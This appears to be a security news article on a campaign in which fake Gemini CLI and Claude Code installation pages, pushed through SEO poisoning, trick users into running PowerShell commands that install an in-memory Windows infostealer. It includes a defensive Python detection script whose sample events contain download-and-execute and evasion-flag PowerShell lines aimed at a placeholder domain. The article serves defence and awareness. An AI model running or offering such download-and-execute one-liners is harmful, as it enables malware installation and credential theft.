Fake Google Gemini and Claude Code Pages Used to Deliver Windows Infostealer Malware in Global SEO Poisoning Campaign


Introduction

A new wave of cyberattacks is abusing the popularity of AI development tools to trick developers and enterprise users into installing information-stealing malware. Security researchers at EclecticIQ have identified a coordinated campaign where attackers created fake websites impersonating Google Gemini’s CLI tool and Anthropic’s Claude Code. These fake portals are being pushed through search engine manipulation techniques and are designed to look like legitimate installation pages. Once users follow the instructions, they unknowingly execute malicious PowerShell commands that install a stealthy infostealer targeting Windows systems.

Summary of the Original Investigation

Security researchers at EclecticIQ discovered a malicious campaign in which threat actors built counterfeit websites mimicking Google Gemini’s coding interface and Anthropic’s Claude Code environment. The discovery was initially highlighted by independent researcher @g0njxa on X, who reported impersonation activity targeting Gemini CLI users. EclecticIQ confirmed that the campaign began as early as March 2026, with attackers registering multiple suspicious domains designed to resemble official AI developer tools.

The infrastructure used in the attack suggests a targeted focus on users in the United States and the United Kingdom, based on domain choices such as .co.uk, .us.com, and .us.org. To increase visibility, attackers used SEO poisoning techniques to push malicious pages above legitimate results in search engines. Victims searching for installation guides are redirected to fake pages that closely imitate official documentation for AI tools.

Once a victim lands on the fake site, they are presented with instructions that appear legitimate. These instructions typically include copying a PowerShell command into the Windows terminal. When executed, the command connects to attacker-controlled servers and downloads an infostealer payload. This malware runs entirely in memory, making detection more difficult, and begins harvesting sensitive data from the infected system.

The malware focuses heavily on enterprise environments and developer workstations. It extracts credentials, cookies, autofill data, and session information from major browsers including Chrome, Edge, Brave, and Firefox. Beyond browsers, it also targets collaboration tools widely used in corporate environments such as Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, Notion, Zoho Mail Desktop, and LiveChat.

In addition to communication platforms, the malware collects data from VPN clients, cloud storage services, cryptocurrency wallets, and local system files. It also gathers configuration data and metadata that can help attackers map the victim’s environment. In some cases, the malware enables remote code execution, allowing attackers to interact directly with compromised systems.

Two separate attack chains were identified. One impersonates Gemini CLI using domains like geminicli[.]co[.]com and gemini-setup[.]com, while the other impersonates Claude Code using claudecode[.]co[.]com and claude-setup[.]com. Both campaigns use similar infrastructure, payload delivery methods, and data exfiltration servers, strongly suggesting a single threat actor is behind both operations.

What Undercode Says:

The campaign reflects a broader evolution in cybercrime where attackers are no longer relying on purely technical exploits. Instead, they are weaponizing trust, branding, and user behavior. By impersonating well-known AI developer tools like Gemini CLI and Claude Code, attackers exploit the growing dependence of developers on AI-assisted workflows.

SEO poisoning is a key part of this strategy. Rather than hacking systems directly, attackers manipulate search rankings so that malicious pages appear more trustworthy than official documentation. This shifts the attack surface from code vulnerabilities to human decision-making, which is often the weakest link in security chains.

The use of PowerShell as a delivery mechanism is particularly significant. PowerShell is a legitimate Windows administration tool, meaning its activity often blends into normal enterprise behavior. Running malware entirely in memory further reduces forensic traces, making detection harder for traditional antivirus systems.
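As an added example (not code from EclecticIQ's report or from this article), the following Python script scores PowerShell Script Block Logging text (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) for the copy-paste download-and-execute pattern described above, so that a blue team can surface it among ordinary administrative activity. The sample events, user names and example.invalid URLs are constructed; the weights and threshold are an assumption to tune per environment.

```python
"""Heuristic triage of PowerShell script block text for download-and-execute one-liners.
Sample events below are constructed; example.invalid is a reserved placeholder domain."""
import re

SAMPLE_EVENTS = [
    {"id": 1, "user": "dev01", "script": "Get-ChildItem C:\\Projects -Recurse | Measure-Object"},
    {"id": 2, "user": "dev02", "script": "iwr https://example.invalid/gemini-cli/install.ps1 -UseBasicParsing | iex"},
    {"id": 3, "user": "dev03", "script": "powershell -nop -w hidden -ep bypass -EncodedCommand <base64 omitted>"},
    {"id": 4, "user": "ops01", "script": "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip"},
]

# Indicator categories: a remote fetch on its own is common admin activity (low weight),
# fetching straight into Invoke-Expression is the hallmark of the fake "installer" pages.
FETCH_RE = re.compile(r"\b(iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
EVASION_RE = re.compile(r"-(nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|enc|encodedcommand)\b", re.I)
ALERT_THRESHOLD = 4  # assumed tuning value


def score_script(script: str):
    """Return (score, reasons) for one script block; higher means more suspicious."""
    score, reasons = 0, []
    fetch = FETCH_RE.search(script)
    if fetch:
        score += 1
        reasons.append(f"remote fetch: {fetch.group(1)}")
    execm = EXEC_RE.search(script)
    if execm:
        score += 2
        reasons.append(f"in-memory execution: {execm.group(1)}")
    if fetch and execm:
        score += 3
        reasons.append("fetch chained into execution (download-and-run)")
    # Count each distinct evasion flag once, normalising whitespace and case.
    flags = {re.sub(r"\s+", " ", m.group(1).lower()) for m in EVASION_RE.finditer(script)}
    score += len(flags)
    reasons.extend(f"evasion flag: -{f}" for f in sorted(flags))
    return score, reasons


def triage(events):
    """Return the events whose score reaches the alert threshold, with their reasons."""
    alerts = []
    for ev in events:
        score, reasons = score_script(ev["script"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "user": ev["user"], "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"event {a['id']} user={a['user']} score={a['score']}: " + "; ".join(a["reasons"]))
```

Script Block Logging must be enabled (Group Policy: Turn on PowerShell Script Block Logging) for these events to exist in the first place, which is the prerequisite this detection depends on.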

The infostealer’s design shows a strong focus on enterprise compromise rather than individual users. By targeting Slack, Teams, Zoom, and Notion, attackers gain access not just to credentials but to entire corporate communication environments. This opens the door to lateral movement within organizations.

The inclusion of cloud storage platforms and VPN configurations suggests an intent to escalate privileges and expand access beyond a single machine. Once attackers gain session cookies or authentication tokens, they can bypass login protections without triggering multi-factor authentication in some cases.

The dual impersonation of Gemini CLI and Claude Code indicates operational scaling. Instead of a single fake brand, attackers replicate multiple trusted ecosystems to increase victim reach. This also reduces dependency on one compromised identity flow.

Shared infrastructure between both campaigns suggests centralized control rather than isolated attackers. This increases the likelihood of a financially motivated group with established malware distribution capabilities.

The memory-resident nature of the infostealer reduces persistence artifacts. This means that once a system is rebooted or cleaned, traditional recovery becomes difficult without network-level detection logs.

Another concerning aspect is the use of encrypted exfiltration channels. This prevents security teams from easily identifying stolen data patterns in transit, delaying incident response.

The targeting of developers is strategically important. Developers often have access to source code repositories, CI/CD pipelines, and production credentials, making them high-value targets for downstream supply chain attacks.

If successful, such campaigns could enable attackers to pivot from individual endpoints into broader enterprise infrastructure, potentially compromising entire organizations through a single infected workstation.

Overall, this campaign shows a convergence of social engineering, search engine manipulation, and advanced malware engineering, making it a highly efficient and scalable attack model.

Fact Checker Results

✔ The campaign is consistent with known SEO poisoning and infostealer distribution techniques used in modern cybercrime.
✔ PowerShell-based memory injection and credential harvesting are established methods used by Windows-targeting malware families.
✔ Claims about impersonation of AI developer tools align with observed trends in phishing against developer ecosystems.

Prediction

Cybercriminal groups will continue targeting AI development tools as they become more integrated into daily workflows.
SEO poisoning attacks will likely increase as a primary infection vector due to their low cost and high reach.
Infostealers will evolve further toward cloud session hijacking and multi-platform credential theft.


References:

Reported By: www.infosecurity-magazine.com
